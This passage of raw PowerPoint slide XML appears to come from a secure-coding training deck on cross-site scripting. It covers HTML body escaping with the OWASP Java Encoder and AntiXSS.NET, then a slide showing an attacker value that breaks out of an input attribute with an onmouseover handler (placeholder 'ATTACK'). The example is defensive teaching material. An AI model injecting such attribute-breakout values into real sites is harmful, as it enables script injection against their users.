          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="27" name="Oval 26"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3285453" y="1431558"/>
                <a:ext cx="1465134" cy="1465129"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="38100" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="tx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p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3373277" y="1519470"/>
                <a:ext cx="1289487" cy="1289304"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="tx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6" name="TextBox 25"/>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HTML</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="248110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8"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HTML Body Escaping Examples</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1643601"/>
            <a:ext cx="8229052" cy="3053658"/>
            <a:chOff x="457200" y="3504779"/>
            <a:chExt cx="8229052" cy="3053658"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="14" name="Picture 13"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3" b="45313"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="3854126"/>
              <a:ext cx="8229051" cy="2704311"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Content Placeholder 4"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="790400" y="4044511"/>
              <a:ext cx="7895852" cy="2168351"/>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50000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2400">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>&lt;div&gt; </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>UNTRUSTED</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t> &lt;/div&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="182880" indent="-457200">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2400">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>&lt;h1&gt; </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>UNTRUSTED</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t> &lt;/h1&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="182880" indent="-457200">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2400">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>&lt;textarea&gt; </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>UNTRUSTED</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t> &lt;/textarea&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="182880" indent="-457200">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2400">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>..&lt;td&gt; </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>UNTRUSTED</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t> &lt;/td&gt;..</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16"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HTML Entity Escaping</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="Group 17"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6969455" y="457200"/>
            <a:ext cx="1716797" cy="1465129"/>
            <a:chOff x="6714321" y="635329"/>
            <a:chExt cx="1716797" cy="1465129"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="19" name="Group 18"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6835420" y="635329"/>
              <a:ext cx="1465134" cy="1465129"/>
              <a:chOff x="3285453" y="1431558"/>
              <a:chExt cx="1465134" cy="1465129"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="21" name="Oval 20"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3285453" y="1431558"/>
                <a:ext cx="1465134" cy="1465129"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="38100" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="tx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p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3373277" y="1519470"/>
                <a:ext cx="1289487" cy="1289304"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="tx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0" name="TextBox 19"/>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HTML</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1333058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HTML Body Escaping Examples</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1643601"/>
            <a:ext cx="8229052" cy="1995269"/>
            <a:chOff x="457200" y="3504779"/>
            <a:chExt cx="8229052" cy="1995269"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="14" name="Picture 13"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3" b="45313"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="3854128"/>
              <a:ext cx="8229052" cy="1645920"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Content Placeholder 4"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="790400" y="4044511"/>
              <a:ext cx="7895852" cy="1060355"/>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50000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2400">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>&lt;div&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>&lt;%= </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" err="1">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>Encode.forHtml</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>(UNTRUSTED) %&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>&lt;/div&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="182880" indent="-457200">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2400">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>&lt;h1&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>&lt;%= </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" err="1">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>Encode.forHtml</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>(UNTRUSTED) %&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>&lt;/h1&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16"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OWASP Java Encoder</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="Group 17"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6969455" y="457200"/>
            <a:ext cx="1716797" cy="1465129"/>
            <a:chOff x="6714321" y="635329"/>
            <a:chExt cx="1716797" cy="1465129"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="19" name="Group 18"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6835420" y="635329"/>
              <a:ext cx="1465134" cy="1465129"/>
              <a:chOff x="3285453" y="1431558"/>
              <a:chExt cx="1465134" cy="1465129"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="21" name="Oval 20"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3285453" y="1431558"/>
                <a:ext cx="1465134" cy="1465129"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="38100" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="tx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p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3373277" y="1519470"/>
                <a:ext cx="1289487" cy="1289304"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="tx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0" name="TextBox 19"/>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HTML</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="23" name="Group 22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3989298"/>
            <a:ext cx="8229052" cy="1080869"/>
            <a:chOff x="457200" y="3504779"/>
            <a:chExt cx="8229052" cy="1080869"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="24" name="Picture 23"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5" b="76565"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="3854128"/>
              <a:ext cx="8229052" cy="731520"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Content Placeholder 4"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="790400" y="4044511"/>
              <a:ext cx="7895852" cy="300082"/>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800" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>Encoder.HtmlEncode</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" b="1">
                  <a:solidFill>
                    <a:srgbClr val="DB3D16"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>UNTRUSTED</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26"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err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>AntiXSS.NET</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4181135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900" decel="100000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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HTML Attribute Body Context</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="282105543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XSS in HTML Attributes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238258" y="2422872"/>
            <a:ext cx="2423726" cy="800219"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="91440" rIns="9144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a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Where else can XSS go?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2661984" y="2422872"/>
            <a:ext cx="6482016" cy="800219"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="182880" tIns="45720" rIns="457200" bIns="45720" anchor="ctr">
            <a:no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800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;input type="text" name="comments" value="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1"/>
              <a:t>?????</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238258" y="3415141"/>
            <a:ext cx="2423726" cy="800219"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="91440" rIns="9144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a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What could an attacker put here?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2661984" y="3415141"/>
            <a:ext cx="6482016" cy="800219"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="182880" tIns="45720" rIns="457200" bIns="45720" anchor="ctr">
            <a:no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800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;input type="text" name="comments</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  value=" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1"/>
              <a:t>hello" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" err="1"/>
              <a:t>onmouseover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1"/>
              <a:t>="ATTACK" id="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238258" y="4445894"/>
            <a:ext cx="2423726" cy="800219"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="91440" rIns="9144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a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Other attribute attacks:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2661984" y="4445894"/>
            <a:ext cx="6482016" cy="800219"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="182880" tIns="45720" rIns="457200" bIns="45720" anchor="ctr">
            <a:no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800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;input type="text" name="comments</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  value="</a:t>
            </a:r>
            <a:r>
